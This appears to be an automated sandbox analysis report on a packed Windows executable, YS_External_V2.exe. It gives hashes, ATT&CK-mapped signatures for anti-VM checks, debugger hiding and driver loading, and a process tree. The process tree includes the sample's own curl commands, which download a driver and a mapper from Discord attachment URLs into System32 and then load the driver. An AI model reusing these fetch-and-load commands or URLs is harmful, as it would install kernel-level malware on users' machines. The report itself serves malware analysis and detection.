914d9b43d9d945fe5c372487ffa692b6d1d68e64945a726b2c35699c31af661e

General

Target

YS_External_V2.exe
Size

23.7MB
MD5

a55deccd022c6cf5a67bd3138a0a6d69
SHA1

cef90145fa44b969af6ec76b7ac650e778e5c953
SHA256

914d9b43d9d945fe5c372487ffa692b6d1d68e64945a726b2c35699c31af661e
SHA512

b797d8ab14c3acc232d243c5a7bd0958929d93c4ba96b4dd68f3167c5b8753c63a874b1a6f0cdcd7f43dcb250958e0572b23ceee6b6e36a1fb1a011fb2e5ada6
SSDEEP

393216:Mm9FpgMIfmAL0Fnch/d9WOBkUS9RBnuBRhfvSoWchi3x1Bn:D97gb0dcd9jkLT8BjYc2N

Score

9^/10

evasion persistence themida trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

YS_External_V2.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ YS_External_V2.exe
Downloads MZ/PE file

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	YS_External_V2.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

yamsmapper.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv"	yamsmapper.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

YS_External_V2.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	YS_External_V2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	YS_External_V2.exe

Executes dropped EXE 1 IoCs

Processes:

yamsmapper.exe

pid process

1976 yamsmapper.exe

pid	process
1976	yamsmapper.exe

Themida packer 7 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/2676-133-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp	themida
behavioral2/memory/2676-135-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp	themida
behavioral2/memory/2676-134-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp	themida
behavioral2/memory/2676-136-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp	themida
behavioral2/memory/2676-137-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp	themida
behavioral2/memory/2676-138-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp	themida
behavioral2/memory/2676-146-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

YS_External_V2.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA YS_External_V2.exe
Drops file in System32 directory 2 IoCs

Processes:

curl.execurl.exe

description ioc process

File created C:\Windows\System32\yamsud.sys curl.exe
File created C:\Windows\System32\yamsmapper.exe curl.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

YS_External_V2.exe

pid process

2676 YS_External_V2.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

yamsmapper.exe

pid process

1976 yamsmapper.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

yamsmapper.exe

description pid process

Token: SeLoadDriverPrivilege 1976 yamsmapper.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	YS_External_V2.exe

description	ioc	process
File created	C:\Windows\System32\yamsud.sys	curl.exe
File created	C:\Windows\System32\yamsmapper.exe	curl.exe

pid	process
2676	YS_External_V2.exe

pid	process
1976	yamsmapper.exe

description	pid	process
Token: SeLoadDriverPrivilege	1976	yamsmapper.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

YS_External_V2.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2676 wrote to memory of 1292	2676	YS_External_V2.exe	cmd.exe
PID 2676 wrote to memory of 1292	2676	YS_External_V2.exe	cmd.exe
PID 2676 wrote to memory of 3572	2676	YS_External_V2.exe	cmd.exe
PID 2676 wrote to memory of 3572	2676	YS_External_V2.exe	cmd.exe
PID 3572 wrote to memory of 3652	3572	cmd.exe	curl.exe
PID 3572 wrote to memory of 3652	3572	cmd.exe	curl.exe
PID 2676 wrote to memory of 536	2676	YS_External_V2.exe	cmd.exe
PID 2676 wrote to memory of 536	2676	YS_External_V2.exe	cmd.exe
PID 536 wrote to memory of 180	536	cmd.exe	curl.exe
PID 536 wrote to memory of 180	536	cmd.exe	curl.exe
PID 2676 wrote to memory of 112	2676	YS_External_V2.exe	cmd.exe
PID 2676 wrote to memory of 112	2676	YS_External_V2.exe	cmd.exe
PID 2676 wrote to memory of 3944	2676	YS_External_V2.exe	cmd.exe
PID 2676 wrote to memory of 3944	2676	YS_External_V2.exe	cmd.exe
PID 3944 wrote to memory of 1976	3944	cmd.exe	yamsmapper.exe
PID 3944 wrote to memory of 1976	3944	cmd.exe	yamsmapper.exe
PID 2676 wrote to memory of 4248	2676	YS_External_V2.exe	cmd.exe
PID 2676 wrote to memory of 4248	2676	YS_External_V2.exe	cmd.exe
PID 2676 wrote to memory of 4932	2676	YS_External_V2.exe	cmd.exe
PID 2676 wrote to memory of 4932	2676	YS_External_V2.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe
"C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:1292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys >nul 2>&1
2⤵
- Suspicious use of WriteProcessMemory
PID:3572

C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys
3⤵
- Drops file in System32 directory
PID:3652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe >nul 2>&1
2⤵
- Suspicious use of WriteProcessMemory
PID:536

C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe
3⤵
- Drops file in System32 directory
PID:180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
2⤵
- Suspicious use of WriteProcessMemory
PID:3944

C:\Windows\System32\yamsmapper.exe
C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:4248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pause >nul 2>&1
2⤵
PID:4932

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\yamsmapper.exe
Filesize
153KB

MD5
666d7f4bb7cf64772755b9a184486525

SHA1
a645d988ff67e72aac11cc9560dbf89a8320aef0

SHA256
a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577

SHA512
3670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864

Download Submit
C:\Windows\System32\yamsmapper.exe
Filesize
153KB

MD5
666d7f4bb7cf64772755b9a184486525

SHA1
a645d988ff67e72aac11cc9560dbf89a8320aef0

SHA256
a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577

SHA512
3670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864

Download Submit
C:\Windows\System32\yamsud.sys
Filesize
12KB

MD5
141ecbccc4bfbf03b8768232d5c6a273

SHA1
0e0c0340b8bccfd6aa352e80739c882e4bbe5404

SHA256
2be40511b4f941f899dcfc579c7f31cfd555292d325d7089a69be76bc9eab122

SHA512
aa0f0bdfab84a6b41006acf40ecfc87aa8bbe5a576d1e696e5c099140e0ac8b2d144d60b112f045dbcc7f13d21b34580b842fe42e9f38727688cddbc4f1787a7

Download Submit
memory/2676-133-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp

Filesize
37.1MB

Download
memory/2676-135-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp

Filesize
37.1MB

Download
memory/2676-134-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp

Filesize
37.1MB

Download
memory/2676-136-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp

Filesize
37.1MB

Download
memory/2676-137-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp

Filesize
37.1MB

Download
memory/2676-138-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp

Filesize
37.1MB

Download
memory/2676-146-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp

Filesize
37.1MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads